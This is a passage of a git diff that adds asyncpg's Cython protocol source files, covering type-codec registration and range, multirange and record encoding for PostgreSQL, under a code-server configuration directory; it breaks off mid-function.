ti['name'] + schema = ti['ns'] + array_element_oid = ti['elemtype'] + range_subtype_oid = ti['range_subtype'] + if ti['attrtypoids']: + comp_type_attrs = tuple(ti['attrtypoids']) + else: + comp_type_attrs = None + base_type = ti['basetype'] + + if array_element_oid: + # Array type (note, there is no separate 'kind' for arrays) + + # Canonicalize type name to "elemtype[]" + if name.startswith('_'): + name = name[1:] + name = '{}[]'.format(name) + + elem_codec = self.get_codec(array_element_oid, PG_FORMAT_ANY) + if elem_codec is None: + elem_codec = self.declare_fallback_codec( + array_element_oid, ti['elemtype_name'], schema) + + elem_delim = ti['elemdelim'][0] + + self._derived_type_codecs[oid, elem_codec.format] = \ + Codec.new_array_codec( + oid, name, schema, elem_codec, elem_delim) + + elif ti['kind'] == b'c': + # Composite type + + if not comp_type_attrs: + raise exceptions.InternalClientError( + f'type record missing field types for composite {oid}') + + comp_elem_codecs = [] + has_text_elements = False + + for typoid in comp_type_attrs: + elem_codec = self.get_codec(typoid, PG_FORMAT_ANY) + if elem_codec is None: + raise exceptions.InternalClientError( + f'no codec for composite attribute type {typoid}') + if elem_codec.format is PG_FORMAT_TEXT: + has_text_elements = True + comp_elem_codecs.append(elem_codec) + + element_names = collections.OrderedDict() + for i, attrname in enumerate(ti['attrnames']): + element_names[attrname] = i + + # If at least one element is text-encoded, we must + # encode the whole composite as text. + if has_text_elements: + elem_format = PG_FORMAT_TEXT + else: + elem_format = PG_FORMAT_BINARY + + self._derived_type_codecs[oid, elem_format] = \ + Codec.new_composite_codec( + oid, name, schema, elem_format, comp_elem_codecs, + comp_type_attrs, element_names) + + elif ti['kind'] == b'd': + # Domain type + + if not base_type: + raise exceptions.InternalClientError( + f'type record missing base type for domain {oid}') + + elem_codec = self.get_codec(base_type, PG_FORMAT_ANY) + if elem_codec is None: + elem_codec = self.declare_fallback_codec( + base_type, ti['basetype_name'], schema) + + self._derived_type_codecs[oid, elem_codec.format] = elem_codec + + elif ti['kind'] == b'r': + # Range type + + if not range_subtype_oid: + raise exceptions.InternalClientError( + f'type record missing base type for range {oid}') + + elem_codec = self.get_codec(range_subtype_oid, PG_FORMAT_ANY) + if elem_codec is None: + elem_codec = self.declare_fallback_codec( + range_subtype_oid, ti['range_subtype_name'], schema) + + self._derived_type_codecs[oid, elem_codec.format] = \ + Codec.new_range_codec(oid, name, schema, elem_codec) + + elif ti['kind'] == b'm': + # Multirange type + + if not range_subtype_oid: + raise exceptions.InternalClientError( + f'type record missing base type for multirange {oid}') + + elem_codec = self.get_codec(range_subtype_oid, PG_FORMAT_ANY) + if elem_codec is None: + elem_codec = self.declare_fallback_codec( + range_subtype_oid, ti['range_subtype_name'], schema) + + self._derived_type_codecs[oid, elem_codec.format] = \ + Codec.new_multirange_codec(oid, name, schema, elem_codec) + + elif ti['kind'] == b'e': + # Enum types are essentially text + self._set_builtin_type_codec(oid, name, schema, 'scalar', + TEXTOID, PG_FORMAT_ANY) + else: + self.declare_fallback_codec(oid, name, schema) + + def add_python_codec(self, typeoid, typename, typeschema, typekind, + typeinfos, encoder, decoder, format, xformat): + cdef: + Codec core_codec = None + encode_func c_encoder = NULL + decode_func c_decoder = NULL + Codec base_codec = None + uint32_t oid = pylong_as_oid(typeoid) + bint codec_set = False + + # Clear all previous overrides (this also clears type cache). + self.remove_python_codec(typeoid, typename, typeschema) + + if typeinfos: + self.add_types(typeinfos) + + if format == PG_FORMAT_ANY: + formats = (PG_FORMAT_TEXT, PG_FORMAT_BINARY) + else: + formats = (format,) + + for fmt in formats: + if xformat == PG_XFORMAT_TUPLE: + if typekind == "scalar": + core_codec = get_core_codec(oid, fmt, xformat) + if core_codec is None: + continue + c_encoder = core_codec.c_encoder + c_decoder = core_codec.c_decoder + elif typekind == "composite": + base_codec = self.get_codec(oid, fmt) + if base_codec is None: + continue + + self._custom_type_codecs[typeoid, fmt] = \ + Codec.new_python_codec(oid, typename, typeschema, typekind, + encoder, decoder, c_encoder, c_decoder, + base_codec, fmt, xformat) + codec_set = True + + if not codec_set: + raise exceptions.InterfaceError( + "{} type does not support the 'tuple' exchange format".format( + typename)) + + def remove_python_codec(self, typeoid, typename, typeschema): + for fmt in (PG_FORMAT_BINARY, PG_FORMAT_TEXT): + self._custom_type_codecs.pop((typeoid, fmt), None) + self.clear_type_cache() + + def _set_builtin_type_codec(self, typeoid, typename, typeschema, typekind, + alias_to, format=PG_FORMAT_ANY): + cdef: + Codec codec + Codec target_codec + uint32_t oid = pylong_as_oid(typeoid) + uint32_t alias_oid = 0 + bint codec_set = False + + if format == PG_FORMAT_ANY: + formats = (PG_FORMAT_BINARY, PG_FORMAT_TEXT) + else: + formats = (format,) + + if isinstance(alias_to, int): + alias_oid = pylong_as_oid(alias_to) + else: + alias_oid = BUILTIN_TYPE_NAME_MAP.get(alias_to, 0) + + for format in formats: + if alias_oid != 0: + target_codec = self.get_codec(alias_oid, format) + else: + target_codec = get_extra_codec(alias_to, format) + + if target_codec is None: + continue + + codec = target_codec.copy() + codec.oid = typeoid + codec.name = typename + codec.schema = typeschema + codec.kind = typekind + + self._custom_type_codecs[typeoid, format] = codec + codec_set = True + + if not codec_set: + if format == PG_FORMAT_BINARY: + codec_str = 'binary' + elif format == PG_FORMAT_TEXT: + codec_str = 'text' + else: + codec_str = 'text or binary' + + raise exceptions.InterfaceError( + f'cannot alias {typename} to {alias_to}: ' + f'there is no {codec_str} codec for {alias_to}') + + def set_builtin_type_codec(self, typeoid, typename, typeschema, typekind, + alias_to, format=PG_FORMAT_ANY): + self._set_builtin_type_codec(typeoid, typename, typeschema, typekind, + alias_to, format) + self.clear_type_cache() + + def clear_type_cache(self): + self._derived_type_codecs.clear() + + def declare_fallback_codec(self, uint32_t oid, str name, str schema): + cdef Codec codec + + if oid <= MAXBUILTINOID: + # This is a BKI type, for which asyncpg has no + # defined codec. This should only happen for newly + # added builtin types, for which this version of + # asyncpg is lacking support. + # + raise exceptions.UnsupportedClientFeatureError( + f'unhandled standard data type {name!r} (OID {oid})') + else: + # This is a non-BKI type, and as such, has no + # stable OID, so no possibility of a builtin codec. + # In this case, fallback to text format. Applications + # can avoid this by specifying a codec for this type + # using Connection.set_type_codec(). + # + self._set_builtin_type_codec(oid, name, schema, 'scalar', + TEXTOID, PG_FORMAT_TEXT) + + codec = self.get_codec(oid, PG_FORMAT_TEXT) + + return codec + + cdef inline Codec get_codec(self, uint32_t oid, ServerDataFormat format, + bint ignore_custom_codec=False): + cdef Codec codec + + if format == PG_FORMAT_ANY: + codec = self.get_codec( + oid, PG_FORMAT_BINARY, ignore_custom_codec) + if codec is None: + codec = self.get_codec( + oid, PG_FORMAT_TEXT, ignore_custom_codec) + return codec + else: + if not ignore_custom_codec: + codec = self.get_custom_codec(oid, PG_FORMAT_ANY) + if codec is not None: + if codec.format != format: + # The codec for this OID has been overridden by + # set_{builtin}_type_codec with a different format. + # We must respect that and not return a core codec. + return None + else: + return codec + + codec = get_core_codec(oid, format) + if codec is not None: + return codec + else: + try: + return self._derived_type_codecs[oid, format] + except KeyError: + return None + + cdef inline Codec get_custom_codec( + self, + uint32_t oid, + ServerDataFormat format + ): + cdef Codec codec + + if format == PG_FORMAT_ANY: + codec = self.get_custom_codec(oid, PG_FORMAT_BINARY) + if codec is None: + codec = self.get_custom_codec(oid, PG_FORMAT_TEXT) + else: + codec = self._custom_type_codecs.get((oid, format)) + + return codec + + +cdef inline Codec get_core_codec( + uint32_t oid, ServerDataFormat format, + ClientExchangeFormat xformat=PG_XFORMAT_OBJECT): + cdef: + void *ptr = NULL + + if oid > MAXSUPPORTEDOID: + return None + if format == PG_FORMAT_BINARY: + ptr = (codec_map).get_binary_codec_ptr(oid * xformat) + elif format == PG_FORMAT_TEXT: + ptr = (codec_map).get_text_codec_ptr(oid * xformat) + + if ptr is NULL: + return None + else: + return ptr + + +cdef inline Codec get_any_core_codec( + uint32_t oid, ServerDataFormat format, + ClientExchangeFormat xformat=PG_XFORMAT_OBJECT): + """A version of get_core_codec that accepts PG_FORMAT_ANY.""" + cdef: + Codec codec + + if format == PG_FORMAT_ANY: + codec = get_core_codec(oid, PG_FORMAT_BINARY, xformat) + if codec is None: + codec = get_core_codec(oid, PG_FORMAT_TEXT, xformat) + else: + codec = get_core_codec(oid, format, xformat) + + return codec + + +cdef inline int has_core_codec(uint32_t oid): + return ( + (codec_map).get_binary_codec_ptr(oid) != NULL + or (codec_map).get_text_codec_ptr(oid) != NULL + ) + + +cdef register_core_codec(uint32_t oid, + encode_func encode, + decode_func decode, + ServerDataFormat format, + ClientExchangeFormat xformat=PG_XFORMAT_OBJECT): + + if oid > MAXSUPPORTEDOID: + raise exceptions.InternalClientError( + 'cannot register core codec for OID {}: it is greater ' + 'than MAXSUPPORTEDOID ({})'.format(oid, MAXSUPPORTEDOID)) + + cdef: + Codec codec + str name + str kind + + name = BUILTIN_TYPE_OID_MAP[oid] + kind = 'array' if oid in ARRAY_TYPES else 'scalar' + + codec = Codec(oid) + codec.init(name, 'pg_catalog', kind, CODEC_C, format, xformat, + encode, decode, None, None, None, None, None, None, None, 0) + cpython.Py_INCREF(codec) # immortalize + + if format == PG_FORMAT_BINARY: + (codec_map).set_binary_codec_ptr(oid * xformat, codec) + elif format == PG_FORMAT_TEXT: + (codec_map).set_text_codec_ptr(oid * xformat, codec) + else: + raise exceptions.InternalClientError( + 'invalid data format: {}'.format(format)) + + +cdef register_extra_codec(str name, + encode_func encode, + decode_func decode, + ServerDataFormat format): + cdef: + Codec codec + str kind + + kind = 'scalar' + + codec = Codec(INVALIDOID) + codec.init(name, None, kind, CODEC_C, format, PG_XFORMAT_OBJECT, + encode, decode, None, None, None, None, None, None, None, 0) + (codec_map).extra_codecs[name, format] = codec + + +cdef inline Codec get_extra_codec(str name, ServerDataFormat format): + return (codec_map).extra_codecs.get((name, format)) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/pgproto.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/pgproto.pyx new file mode 100755 index 0000000..51d650d --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/pgproto.pyx @@ -0,0 +1,484 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef init_bits_codecs(): + register_core_codec(BITOID, + pgproto.bits_encode, + pgproto.bits_decode, + PG_FORMAT_BINARY) + + register_core_codec(VARBITOID, + pgproto.bits_encode, + pgproto.bits_decode, + PG_FORMAT_BINARY) + + +cdef init_bytea_codecs(): + register_core_codec(BYTEAOID, + pgproto.bytea_encode, + pgproto.bytea_decode, + PG_FORMAT_BINARY) + + register_core_codec(CHAROID, + pgproto.bytea_encode, + pgproto.bytea_decode, + PG_FORMAT_BINARY) + + +cdef init_datetime_codecs(): + register_core_codec(DATEOID, + pgproto.date_encode, + pgproto.date_decode, + PG_FORMAT_BINARY) + + register_core_codec(DATEOID, + pgproto.date_encode_tuple, + pgproto.date_decode_tuple, + PG_FORMAT_BINARY, + PG_XFORMAT_TUPLE) + + register_core_codec(TIMEOID, + pgproto.time_encode, + pgproto.time_decode, + PG_FORMAT_BINARY) + + register_core_codec(TIMEOID, + pgproto.time_encode_tuple, + pgproto.time_decode_tuple, + PG_FORMAT_BINARY, + PG_XFORMAT_TUPLE) + + register_core_codec(TIMETZOID, + pgproto.timetz_encode, + pgproto.timetz_decode, + PG_FORMAT_BINARY) + + register_core_codec(TIMETZOID, + pgproto.timetz_encode_tuple, + pgproto.timetz_decode_tuple, + PG_FORMAT_BINARY, + PG_XFORMAT_TUPLE) + + register_core_codec(TIMESTAMPOID, + pgproto.timestamp_encode, + pgproto.timestamp_decode, + PG_FORMAT_BINARY) + + register_core_codec(TIMESTAMPOID, + pgproto.timestamp_encode_tuple, + pgproto.timestamp_decode_tuple, + PG_FORMAT_BINARY, + PG_XFORMAT_TUPLE) + + register_core_codec(TIMESTAMPTZOID, + pgproto.timestamptz_encode, + pgproto.timestamptz_decode, + PG_FORMAT_BINARY) + + register_core_codec(TIMESTAMPTZOID, + pgproto.timestamp_encode_tuple, + pgproto.timestamp_decode_tuple, + PG_FORMAT_BINARY, + PG_XFORMAT_TUPLE) + + register_core_codec(INTERVALOID, + pgproto.interval_encode, + pgproto.interval_decode, + PG_FORMAT_BINARY) + + register_core_codec(INTERVALOID, + pgproto.interval_encode_tuple, + pgproto.interval_decode_tuple, + PG_FORMAT_BINARY, + PG_XFORMAT_TUPLE) + + # For obsolete abstime/reltime/tinterval, we do not bother to + # interpret the value, and simply return and pass it as text. + # + register_core_codec(ABSTIMEOID, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_TEXT) + + register_core_codec(RELTIMEOID, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_TEXT) + + register_core_codec(TINTERVALOID, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_TEXT) + + +cdef init_float_codecs(): + register_core_codec(FLOAT4OID, + pgproto.float4_encode, + pgproto.float4_decode, + PG_FORMAT_BINARY) + + register_core_codec(FLOAT8OID, + pgproto.float8_encode, + pgproto.float8_decode, + PG_FORMAT_BINARY) + + +cdef init_geometry_codecs(): + register_core_codec(BOXOID, + pgproto.box_encode, + pgproto.box_decode, + PG_FORMAT_BINARY) + + register_core_codec(LINEOID, + pgproto.line_encode, + pgproto.line_decode, + PG_FORMAT_BINARY) + + register_core_codec(LSEGOID, + pgproto.lseg_encode, + pgproto.lseg_decode, + PG_FORMAT_BINARY) + + register_core_codec(POINTOID, + pgproto.point_encode, + pgproto.point_decode, + PG_FORMAT_BINARY) + + register_core_codec(PATHOID, + pgproto.path_encode, + pgproto.path_decode, + PG_FORMAT_BINARY) + + register_core_codec(POLYGONOID, + pgproto.poly_encode, + pgproto.poly_decode, + PG_FORMAT_BINARY) + + register_core_codec(CIRCLEOID, + pgproto.circle_encode, + pgproto.circle_decode, + PG_FORMAT_BINARY) + + +cdef init_hstore_codecs(): + register_extra_codec('pg_contrib.hstore', + pgproto.hstore_encode, + pgproto.hstore_decode, + PG_FORMAT_BINARY) + + +cdef init_json_codecs(): + register_core_codec(JSONOID, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_BINARY) + register_core_codec(JSONBOID, + pgproto.jsonb_encode, + pgproto.jsonb_decode, + PG_FORMAT_BINARY) + register_core_codec(JSONPATHOID, + pgproto.jsonpath_encode, + pgproto.jsonpath_decode, + PG_FORMAT_BINARY) + + +cdef init_int_codecs(): + + register_core_codec(BOOLOID, + pgproto.bool_encode, + pgproto.bool_decode, + PG_FORMAT_BINARY) + + register_core_codec(INT2OID, + pgproto.int2_encode, + pgproto.int2_decode, + PG_FORMAT_BINARY) + + register_core_codec(INT4OID, + pgproto.int4_encode, + pgproto.int4_decode, + PG_FORMAT_BINARY) + + register_core_codec(INT8OID, + pgproto.int8_encode, + pgproto.int8_decode, + PG_FORMAT_BINARY) + + +cdef init_pseudo_codecs(): + # Void type is returned by SELECT void_returning_function() + register_core_codec(VOIDOID, + pgproto.void_encode, + pgproto.void_decode, + PG_FORMAT_BINARY) + + # Unknown type, always decoded as text + register_core_codec(UNKNOWNOID, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_TEXT) + + # OID and friends + oid_types = [ + OIDOID, XIDOID, CIDOID + ] + + for oid_type in oid_types: + register_core_codec(oid_type, + pgproto.uint4_encode, + pgproto.uint4_decode, + PG_FORMAT_BINARY) + + # 64-bit OID types + oid8_types = [ + XID8OID, + ] + + for oid_type in oid8_types: + register_core_codec(oid_type, + pgproto.uint8_encode, + pgproto.uint8_decode, + PG_FORMAT_BINARY) + + # reg* types -- these are really system catalog OIDs, but + # allow the catalog object name as an input. We could just + # decode these as OIDs, but handling them as text seems more + # useful. + # + reg_types = [ + REGPROCOID, REGPROCEDUREOID, REGOPEROID, REGOPERATOROID, + REGCLASSOID, REGTYPEOID, REGCONFIGOID, REGDICTIONARYOID, + REGNAMESPACEOID, REGROLEOID, REFCURSOROID, REGCOLLATIONOID, + ] + + for reg_type in reg_types: + register_core_codec(reg_type, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_TEXT) + + # cstring type is used by Postgres' I/O functions + register_core_codec(CSTRINGOID, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_BINARY) + + # various system pseudotypes with no I/O + no_io_types = [ + ANYOID, TRIGGEROID, EVENT_TRIGGEROID, LANGUAGE_HANDLEROID, + FDW_HANDLEROID, TSM_HANDLEROID, INTERNALOID, OPAQUEOID, + ANYELEMENTOID, ANYNONARRAYOID, ANYCOMPATIBLEOID, + ANYCOMPATIBLEARRAYOID, ANYCOMPATIBLENONARRAYOID, + ANYCOMPATIBLERANGEOID, ANYCOMPATIBLEMULTIRANGEOID, + ANYRANGEOID, ANYMULTIRANGEOID, ANYARRAYOID, + PG_DDL_COMMANDOID, INDEX_AM_HANDLEROID, TABLE_AM_HANDLEROID, + ] + + register_core_codec(ANYENUMOID, + NULL, + pgproto.text_decode, + PG_FORMAT_TEXT) + + for no_io_type in no_io_types: + register_core_codec(no_io_type, + NULL, + NULL, + PG_FORMAT_BINARY) + + # ACL specification string + register_core_codec(ACLITEMOID, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_TEXT) + + # Postgres' serialized expression tree type + register_core_codec(PG_NODE_TREEOID, + NULL, + pgproto.text_decode, + PG_FORMAT_TEXT) + + # pg_lsn type -- a pointer to a location in the XLOG. + register_core_codec(PG_LSNOID, + pgproto.int8_encode, + pgproto.int8_decode, + PG_FORMAT_BINARY) + + register_core_codec(SMGROID, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_TEXT) + + # pg_dependencies and pg_ndistinct are special types + # used in pg_statistic_ext columns. + register_core_codec(PG_DEPENDENCIESOID, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_TEXT) + + register_core_codec(PG_NDISTINCTOID, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_TEXT) + + # pg_mcv_list is a special type used in pg_statistic_ext_data + # system catalog + register_core_codec(PG_MCV_LISTOID, + pgproto.bytea_encode, + pgproto.bytea_decode, + PG_FORMAT_BINARY) + + # These two are internal to BRIN index support and are unlikely + # to be sent, but since I/O functions for these exist, add decoders + # nonetheless. + register_core_codec(PG_BRIN_BLOOM_SUMMARYOID, + NULL, + pgproto.bytea_decode, + PG_FORMAT_BINARY) + + register_core_codec(PG_BRIN_MINMAX_MULTI_SUMMARYOID, + NULL, + pgproto.bytea_decode, + PG_FORMAT_BINARY) + + +cdef init_text_codecs(): + textoids = [ + NAMEOID, + BPCHAROID, + VARCHAROID, + TEXTOID, + XMLOID + ] + + for oid in textoids: + register_core_codec(oid, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_BINARY) + + register_core_codec(oid, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_TEXT) + + +cdef init_tid_codecs(): + register_core_codec(TIDOID, + pgproto.tid_encode, + pgproto.tid_decode, + PG_FORMAT_BINARY) + + +cdef init_txid_codecs(): + register_core_codec(TXID_SNAPSHOTOID, + pgproto.pg_snapshot_encode, + pgproto.pg_snapshot_decode, + PG_FORMAT_BINARY) + + register_core_codec(PG_SNAPSHOTOID, + pgproto.pg_snapshot_encode, + pgproto.pg_snapshot_decode, + PG_FORMAT_BINARY) + + +cdef init_tsearch_codecs(): + ts_oids = [ + TSQUERYOID, + TSVECTOROID, + ] + + for oid in ts_oids: + register_core_codec(oid, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_TEXT) + + register_core_codec(GTSVECTOROID, + NULL, + pgproto.text_decode, + PG_FORMAT_TEXT) + + +cdef init_uuid_codecs(): + register_core_codec(UUIDOID, + pgproto.uuid_encode, + pgproto.uuid_decode, + PG_FORMAT_BINARY) + + +cdef init_numeric_codecs(): + register_core_codec(NUMERICOID, + pgproto.numeric_encode_text, + pgproto.numeric_decode_text, + PG_FORMAT_TEXT) + + register_core_codec(NUMERICOID, + pgproto.numeric_encode_binary, + pgproto.numeric_decode_binary, + PG_FORMAT_BINARY) + + +cdef init_network_codecs(): + register_core_codec(CIDROID, + pgproto.cidr_encode, + pgproto.cidr_decode, + PG_FORMAT_BINARY) + + register_core_codec(INETOID, + pgproto.inet_encode, + pgproto.inet_decode, + PG_FORMAT_BINARY) + + register_core_codec(MACADDROID, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_TEXT) + + register_core_codec(MACADDR8OID, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_TEXT) + + +cdef init_monetary_codecs(): + moneyoids = [ + MONEYOID, + ] + + for oid in moneyoids: + register_core_codec(oid, + pgproto.text_encode, + pgproto.text_decode, + PG_FORMAT_TEXT) + + +cdef init_all_pgproto_codecs(): + # Builtin types, in lexicographical order. + init_bits_codecs() + init_bytea_codecs() + init_datetime_codecs() + init_float_codecs() + init_geometry_codecs() + init_int_codecs() + init_json_codecs() + init_monetary_codecs() + init_network_codecs() + init_numeric_codecs() + init_text_codecs() + init_tid_codecs() + init_tsearch_codecs() + init_txid_codecs() + init_uuid_codecs() + + # Various pseudotypes and system types + init_pseudo_codecs() + + # contrib + init_hstore_codecs() + + +init_all_pgproto_codecs() diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/range.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/range.pyx new file mode 100755 index 0000000..1038c18 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/range.pyx @@ -0,0 +1,207 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +from asyncpg import types as apg_types + +from collections.abc import Sequence as SequenceABC + +# defined in postgresql/src/include/utils/rangetypes.h +DEF RANGE_EMPTY = 0x01 # range is empty +DEF RANGE_LB_INC = 0x02 # lower bound is inclusive +DEF RANGE_UB_INC = 0x04 # upper bound is inclusive +DEF RANGE_LB_INF = 0x08 # lower bound is -infinity +DEF RANGE_UB_INF = 0x10 # upper bound is +infinity + + +cdef enum _RangeArgumentType: + _RANGE_ARGUMENT_INVALID = 0 + _RANGE_ARGUMENT_TUPLE = 1 + _RANGE_ARGUMENT_RANGE = 2 + + +cdef inline bint _range_has_lbound(uint8_t flags): + return not (flags & (RANGE_EMPTY | RANGE_LB_INF)) + + +cdef inline bint _range_has_ubound(uint8_t flags): + return not (flags & (RANGE_EMPTY | RANGE_UB_INF)) + + +cdef inline _RangeArgumentType _range_type(object obj): + if cpython.PyTuple_Check(obj) or cpython.PyList_Check(obj): + return _RANGE_ARGUMENT_TUPLE + elif isinstance(obj, apg_types.Range): + return _RANGE_ARGUMENT_RANGE + else: + return _RANGE_ARGUMENT_INVALID + + +cdef range_encode(ConnectionSettings settings, WriteBuffer buf, + object obj, uint32_t elem_oid, + encode_func_ex encoder, const void *encoder_arg): + cdef: + ssize_t obj_len + uint8_t flags = 0 + object lower = None + object upper = None + WriteBuffer bounds_data = WriteBuffer.new() + _RangeArgumentType arg_type = _range_type(obj) + + if arg_type == _RANGE_ARGUMENT_INVALID: + raise TypeError( + 'list, tuple or Range object expected (got type {})'.format( + type(obj))) + + elif arg_type == _RANGE_ARGUMENT_TUPLE: + obj_len = len(obj) + if obj_len == 2: + lower = obj[0] + upper = obj[1] + + if lower is None: + flags |= RANGE_LB_INF + + if upper is None: + flags |= RANGE_UB_INF + + flags |= RANGE_LB_INC | RANGE_UB_INC + + elif obj_len == 1: + lower = obj[0] + flags |= RANGE_LB_INC | RANGE_UB_INF + + elif obj_len == 0: + flags |= RANGE_EMPTY + + else: + raise ValueError( + 'expected 0, 1 or 2 elements in range (got {})'.format( + obj_len)) + + else: + if obj.isempty: + flags |= RANGE_EMPTY + else: + lower = obj.lower + upper = obj.upper + + if obj.lower_inc: + flags |= RANGE_LB_INC + elif lower is None: + flags |= RANGE_LB_INF + + if obj.upper_inc: + flags |= RANGE_UB_INC + elif upper is None: + flags |= RANGE_UB_INF + + if _range_has_lbound(flags): + encoder(settings, bounds_data, lower, encoder_arg) + + if _range_has_ubound(flags): + encoder(settings, bounds_data, upper, encoder_arg) + + buf.write_int32(1 + bounds_data.len()) + buf.write_byte(flags) + buf.write_buffer(bounds_data) + + +cdef range_decode(ConnectionSettings settings, FRBuffer *buf, + decode_func_ex decoder, const void *decoder_arg): + cdef: + uint8_t flags = frb_read(buf, 1)[0] + int32_t bound_len + object lower = None + object upper = None + FRBuffer bound_buf + + if _range_has_lbound(flags): + bound_len = hton.unpack_int32(frb_read(buf, 4)) + if bound_len == -1: + lower = None + else: + frb_slice_from(&bound_buf, buf, bound_len) + lower = decoder(settings, &bound_buf, decoder_arg) + + if _range_has_ubound(flags): + bound_len = hton.unpack_int32(frb_read(buf, 4)) + if bound_len == -1: + upper = None + else: + frb_slice_from(&bound_buf, buf, bound_len) + upper = decoder(settings, &bound_buf, decoder_arg) + + return apg_types.Range(lower=lower, upper=upper, + lower_inc=(flags & RANGE_LB_INC) != 0, + upper_inc=(flags & RANGE_UB_INC) != 0, + empty=(flags & RANGE_EMPTY) != 0) + + +cdef multirange_encode(ConnectionSettings settings, WriteBuffer buf, + object obj, uint32_t elem_oid, + encode_func_ex encoder, const void *encoder_arg): + cdef: + WriteBuffer elem_data + ssize_t elem_data_len + ssize_t elem_count + + if not isinstance(obj, SequenceABC): + raise TypeError( + 'expected a sequence (got type {!r})'.format(type(obj).__name__) + ) + + elem_data = WriteBuffer.new() + + for elem in obj: + range_encode(settings, elem_data, elem, elem_oid, encoder, encoder_arg) + + elem_count = len(obj) + if elem_count > INT32_MAX: + raise OverflowError(f'too many elements in multirange value') + + elem_data_len = elem_data.len() + if elem_data_len > INT32_MAX - 4: + raise OverflowError( + f'size of encoded multirange datum exceeds the maximum allowed' + f' {INT32_MAX - 4} bytes') + + # Datum length + buf.write_int32(4 + elem_data_len) + # Number of elements in multirange + buf.write_int32(elem_count) + buf.write_buffer(elem_data) + + +cdef multirange_decode(ConnectionSettings settings, FRBuffer *buf, + decode_func_ex decoder, const void *decoder_arg): + cdef: + int32_t nelems = hton.unpack_int32(frb_read(buf, 4)) + FRBuffer elem_buf + int32_t elem_len + int i + list result + + if nelems == 0: + return [] + + if nelems < 0: + raise exceptions.ProtocolError( + 'unexpected multirange size value: {}'.format(nelems)) + + result = cpython.PyList_New(nelems) + for i in range(nelems): + elem_len = hton.unpack_int32(frb_read(buf, 4)) + if elem_len == -1: + raise exceptions.ProtocolError( + 'unexpected NULL element in multirange value') + else: + frb_slice_from(&elem_buf, buf, elem_len) + elem = range_decode(settings, &elem_buf, decoder, decoder_arg) + cpython.Py_INCREF(elem) + cpython.PyList_SET_ITEM(result, i, elem) + + return result diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/record.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/record.pyx new file mode 100755 index 0000000..6446f2d --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/record.pyx @@ -0,0 +1,71 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +from asyncpg import exceptions + + +cdef inline record_encode_frame(ConnectionSettings settings, WriteBuffer buf, + WriteBuffer elem_data, int32_t elem_count): + buf.write_int32(4 + elem_data.len()) + # attribute count + buf.write_int32(elem_count) + # encoded attribute data + buf.write_buffer(elem_data) + + +cdef anonymous_record_decode(ConnectionSettings settings, FRBuffer *buf): + cdef: + tuple result + ssize_t elem_count + ssize_t i + int32_t elem_len + uint32_t elem_typ + Codec elem_codec + FRBuffer elem_buf + + elem_count = hton.unpack_int32(frb_read(buf, 4)) + result = cpython.PyTuple_New(elem_count) + + for i in range(elem_count): + elem_typ = hton.unpack_int32(frb_read(buf, 4)) + elem_len = hton.unpack_int32(frb_read(buf, 4)) + + if elem_len == -1: + elem = None + else: + elem_codec = settings.get_data_codec(elem_typ) + if elem_codec is None or not elem_codec.has_decoder(): + raise exceptions.InternalClientError( + 'no decoder for composite type element in ' + 'position {} of type OID {}'.format(i, elem_typ)) + elem = elem_codec.decode(settings, + frb_slice_from(&elem_buf, buf, elem_len)) + + cpython.Py_INCREF(elem) + cpython.PyTuple_SET_ITEM(result, i, elem) + + return result + + +cdef anonymous_record_encode(ConnectionSettings settings, WriteBuffer buf, obj): + raise exceptions.UnsupportedClientFeatureError( + 'input of anonymous composite types is not supported', + hint=( + 'Consider declaring an explicit composite type and ' + 'using it to cast the argument.' + ), + detail='PostgreSQL does not implement anonymous composite type input.' + ) + + +cdef init_record_codecs(): + register_core_codec(RECORDOID, + anonymous_record_encode, + anonymous_record_decode, + PG_FORMAT_BINARY) + +init_record_codecs() diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/textutils.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/textutils.pyx new file mode 100755 index 0000000..dfaf29e --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/textutils.pyx @@ -0,0 +1,99 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef inline uint32_t _apg_tolower(uint32_t c): + if c >= 'A' and c <= 'Z': + return c + 'a' - 'A' + else: + return c + + +cdef int apg_strcasecmp(const Py_UCS4 *s1, const Py_UCS4 *s2): + cdef: + 